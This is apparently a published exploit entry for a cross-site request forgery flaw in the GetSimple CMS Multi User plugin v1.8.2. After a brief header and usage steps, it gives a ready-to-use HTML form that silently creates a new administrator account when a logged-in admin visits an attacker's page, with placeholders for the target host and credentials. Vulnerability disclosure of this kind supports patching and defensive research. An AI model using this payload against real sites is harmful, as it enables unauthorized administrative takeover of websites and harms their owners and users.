# Exploit Title: GetSimple CMS Plugin Multi User v1.8.2 - Cross-Site Request Forgery (Add Admin)# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)# Date: August 2020-08-12# Vendor Homepage: http://get-simple.info/extend/plugin/multi-user/133/# Software Link: http://get-simple.info/extend/export/960/133/multi-user.zip# Version: 1.8.2# Tested On: Windows 10 Pro + XAMPP# CWE-352: Cross-Site Request Forgery (CSRF)# Vulnerability Description:# Cross-Site Request Forgery (CSRF) vulnerability in Multi User v1.8.2 plugin for GetSimple CMS allows remote attackers to add an Admin user via authenticated admin visiting a third-party site.## Usage: + Change <IP||DOMAIN> to target IP address or domain name
+ Change <ADMIN> to target username
+ Change <PASSWORD> to target password
## CSRF POST Form Method<html><body><script>history.pushState('','','/')</script><form action="http://<IP||DOMAIN>/admin/load.php?id=user-managment" method="POST"><inputtype="hidden" name="usernamec" value="<ADMIN>"/><inputtype="hidden" name="useremail" value="ADMIN@DOMAIN.LOCAL"/><inputtype="hidden" name="ntimezone" value=""/><inputtype="hidden" name="userlng" value="en_US"/><inputtype="hidden" name="userpassword" value="<PASSWORD>"/><inputtype="hidden" name="usereditor" value="1"/><inputtype="hidden" name="Landing" value=""/><inputtype="hidden" name="add-user" value="Add New User"/><inputtype="submit" value="Submit request"/></form></body></html>
